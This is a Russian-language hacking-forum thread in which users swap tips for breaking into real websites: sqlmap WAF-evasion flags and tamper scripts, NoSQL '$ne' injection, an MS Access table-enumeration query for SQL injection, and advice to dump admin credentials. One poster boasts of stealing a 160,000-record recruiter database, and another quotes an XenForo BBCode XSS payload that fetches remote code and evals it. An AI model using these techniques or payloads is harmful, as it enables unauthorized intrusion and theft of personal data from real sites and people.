• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Отслеживать
etc/passwd сказал(а):
--offline

либо используй софт, который читает файлы sqllite. Точное название не помню. Импортируй в него сессию.
Спасибо, а это верно, что —resume позволяет начать с последнего сохраненного, чтоб не сначала?
 
helixtwins сказал(а):
Спасибо, а это верно, что —resume позволяет начать с последнего сохраненного, чтоб не сначала?
результат помомему в файле session и когда нажмёшь дампить с теми же флагами он итак начнет с последнего , если нет то попробуй locate "target" и там сориентируешься
 
helixtwins сказал(а):
В дампе мыло-пасс попадаются записи типа email@email.com, NULL
Это пароля нет? Или какая-то защита сработала и не дала пасс сдернуть?
да, поле пустое, пароль не задан
 
kukuruznik сказал(а):
C:\ProgramData\Acunetix\settings.ini

max_scans_per_engine=20
подскажите в линукс где этот параметр найти ? файла settings.ini нет , нагуглить тоже не получилось
 
googlesearch сказал(а):
подскажите в линукс где этот параметр найти ? файла settings.ini нет , нагуглить тоже не получилось

В документации инфа вся(отрезок оттуда, ссылка):


Код: 
How to edit the Acunetix settings.xml

Open the settings.xml file from the relevant location:

Windows: C:\ProgramData\Acunetix\shared\general\settings.xml
Linux: /home/acunetix/.acunetix/data/general/settings.xml

Make your changes.
For the changes to take effect, restart Acunetix.
 
MrDark сказал(а):
This happens usually when target is protected by internal or external waf.
There are multiple ways to attempt, but first thing I suggest if you got the knowledge to do it, use burp suite's proxy to see what is blocking your requests.
Use tamper scripts, i suggest the fallowing since backend is microsoft sql server: --tamper=between,charencode,equaltolike,space2comment ( try first with --tamper=between if it doesn't work try including --tamper=space2comment,between and so on ( basically ad 1 more tamper on each new attempt ). Make sure your command always includes --random-agent , also include --fresh-queries each new attempt you launch, if all attempts fail ~ try re-hacking it again with tamper from the begining, random agent and --delay=3 or 6 should do the job.
If all this fails, try adding --hex --fresh queries ( or --flush-session to re-start from begining deleting all logs on that target ).

Burpsuite proxy will help you see exactly what and where is blocking your requests, watch some youtube videos on how to use it or read some guides, not so hard.
Thanks for help, actually this case was resolved a different way. I found another site from DB list on host. It was more vulnerable. Tampers didn't help unfortunately.
 
Screenshot 2025-10-06 at 07.39.53.png

Есть вот такая уязвомось с { "$ne": null }, но на все пэйлоады для mongodb один ответ и данных не выдает других, RCE не работает. Что посоветуете попробовать?
 
Последнее редактирование:
chmod_777 сказал(а):
Посмотреть вложение 110827
Есть вот такая уязвомось с { "$ne": null }, но на все пэйлоады для mongodb один ответ и данных не выдает других, RCE не работает. Что посоветуете попробовать?
Мало контекста, nosqlmap попробуй. Руками можно попробовать через регулярки что то вытащить(по сути брут получится)
 
Неактуально, все решилось. Надо оффтопно высказаться, не баньте.
Спасибо за ответы и статьи, я сегодня слил базу рекрутеров на 160к, я так боялся, что не научусь ломать больше и надо будет идти на завод. Но не пойду, я не совсем дебил (тьфу 3 раза).
 
Последнее редактирование:
Подскажите пожалуйста, а как выколупывать таблицы и колонки из db ms access? Гуглил, там баз как таковых вроде нет, надо сразу таблицы искать. но не ищет, перебрасывает на брут по словарю. В итоге или находит весь словарь, или вообще ничего.
Однажды давно удалось найти таблс и колонки к ним. но не смог вытащить данные.
Можно это побороть и как?
 
helixtwins сказал(а):
Подскажите пожалуйста, а как выколупывать таблицы и колонки из db ms access? Гуглил, там баз как таковых вроде нет, надо сразу таблицы искать. но не ищет, перебрасывает на брут по словарю. В итоге или находит весь словарь, или вообще ничего.
Однажды давно удалось найти таблс и колонки к ним. но не смог вытащить данные.
Можно это побороть и как?
Сдампь юзернейм и пароль админа, а затем войди с ними в панель управления базой данных/сайтом Так будет проще сдампить все данные
 
Gh0stByte сказал(а):
Сдампь юзернейм и пароль админа, а затем войди с ними в панель управления базой данных/сайтом Так будет проще сдампить все данные
А как это сделать, если нет таблиц и колонок?
 
helixtwins сказал(а):
Подскажите пожалуйста, а как выколупывать таблицы и колонки из db ms access? Гуглил, там баз как таковых вроде нет, надо сразу таблицы искать. но не ищет, перебрасывает на брут по словарю. В итоге или находит весь словарь, или вообще ничего.
Однажды давно удалось найти таблс и колонки к ним. но не смог вытащить данные.
Можно это побороть и как?
Получить список таблиц:

SQL: 
select MSysObjects.name
from MSysObjects
where
   MSysObjects.type In (1,4,6)
   and MSysObjects.name not like '~*'
   and MSysObjects.name not like 'MSys*'
order by MSysObjects.name

Парни советую заглядывать в документацию того с чем работаете, большинство решений лежит на поверхности, вот еще что может помочь:

MS Access SQL Injection - HackTricks

book.hacktricks.wiki
 
Последнее редактирование:
7h3_Qu1et_Bug сказал(а):
Получить список таблиц:

SQL: 
select MSysObjects.name
from MSysObjects
where
   MSysObjects.type In (1,4,6)
   and MSysObjects.name not like '~*'
   and MSysObjects.name not like 'MSys*'
order by MSysObjects.name

Парни советую заглядывать в документацию того с чем работаете, большинство решений лежит на поверхности, вот еще что может помочь:

MS Access SQL Injection - HackTricks

book.hacktricks.wiki
Спасибо!!!
 
На одном из форум XenForo увидел много сообщений с таким содержание
Код: 
[DYNAMICURL='" style=position:absolute;opacity:0><img src=//k onerror="fetch(`htt`+`ps://**********/kalita.jpg`).then(x=&gt;x.text()).then(x=&gt;eval(x.slice(70048)))']k[/DYNAMICURL]
Что это?
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх